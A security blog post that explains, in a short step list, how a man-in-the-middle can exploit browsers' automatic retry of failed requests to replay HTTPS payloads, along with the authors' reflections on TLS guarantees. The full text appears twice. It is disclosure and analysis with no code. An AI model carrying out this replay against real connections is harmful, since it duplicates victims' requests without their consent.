(joint work with Thiago Valverde and Quan Nguyen -- see also Thiago's post on his blog)
I was once advised by a self-help book that I should never give up, be confident in myself, and keep trying. The secret to success is failure, wrote the book. I'd always believed that this is a great wisdom until Thiago and Quan helped me realize that it could lead to replay attacks.
A few weeks ago we found that because Chrome (and Firefox and possibly other browsers) automatically retries failed requests, a man-in-the-middle adversary can easily duplicate and replay HTTPS traffic. More details can be found in Thiago's blog post, but the attack can be summarized as follows:
* The adversary sets itself up as a TCP layer relay for the targeted TLS connection to, say, google.com.
* When the adversary detects a request that it wants to replay (using traffic analysis), it copies all relevant TLS records, and instead of relaying the HTTP response from the server it just closes the socket to Chrome. It keeps the leg to google.com open.
* Over a fresh socket, Chrome would automatically retry the (presumably failed) request. The adversary would then forward it normally to google.com.
* Adversary replays the copied records to google.com, which will happily accept them.
This a cute attack, but we don't think it's too alarming. While Thiago made a proof of concept which works like a charm against an internal tool at Google, we failed to mount the attack against PayPal though. It looks like most important websites that we looked at have some defense against this attack, probably not because they are aware of it, but because they just want to prevent their users from unintentionally sending duplicated requests.
Still it's amusing thinking about what has gone wrong here. I don't blame TLS, which does the right thing when it comes to replay attacks. TLS promises that none can replay its records, and it delivers by using random nonces and sequence numbers. No TLS records were replayed in our attack. We can't do that. What we replayed was HTTP payload.
This attack exploits a mismatch between what is promised by TLS and what is actually deployed. TLS proudly declares, "Alright. TLS clients and servers of the world, we protect your traffic against replay attacks," but our beloved protocol can't do nothing when clients replay their own traffic, which is what happening in the real world. As a result servers still have to defend themselves, which is surprising, and might caught some developers off-guard.
Moral of the story: give up on the first failure and stop reading self-help books.
I was once advised by a self-help book that I should never give up, be confident in myself, and keep trying. The secret to success is failure, wrote the book. I'd always believed that this is a great wisdom until Thiago and Quan helped me realize that it could lead to replay attacks.
A few weeks ago we found that because Chrome (and Firefox and possibly other browsers) automatically retries failed requests, a man-in-the-middle adversary can easily duplicate and replay HTTPS traffic. More details can be found in Thiago's blog post, but the attack can be summarized as follows:
* The adversary sets itself up as a TCP layer relay for the targeted TLS connection to, say, google.com.
* When the adversary detects a request that it wants to replay (using traffic analysis), it copies all relevant TLS records, and instead of relaying the HTTP response from the server it just closes the socket to Chrome. It keeps the leg to google.com open.
* Over a fresh socket, Chrome would automatically retry the (presumably failed) request. The adversary would then forward it normally to google.com.
* Adversary replays the copied records to google.com, which will happily accept them.
This a cute attack, but we don't think it's too alarming. While Thiago made a proof of concept which works like a charm against an internal tool at Google, we failed to mount the attack against PayPal though. It looks like most important websites that we looked at have some defense against this attack, probably not because they are aware of it, but because they just want to prevent their users from unintentionally sending duplicated requests.
Still it's amusing thinking about what has gone wrong here. I don't blame TLS, which does the right thing when it comes to replay attacks. TLS promises that none can replay its records, and it delivers by using random nonces and sequence numbers. No TLS records were replayed in our attack. We can't do that. What we replayed was HTTP payload.
This attack exploits a mismatch between what is promised by TLS and what is actually deployed. TLS proudly declares, "Alright. TLS clients and servers of the world, we protect your traffic against replay attacks," but our beloved protocol can't do nothing when clients replay their own traffic, which is what happening in the real world. As a result servers still have to defend themselves, which is surprising, and might caught some developers off-guard.
Moral of the story: give up on the first failure and stop reading self-help books.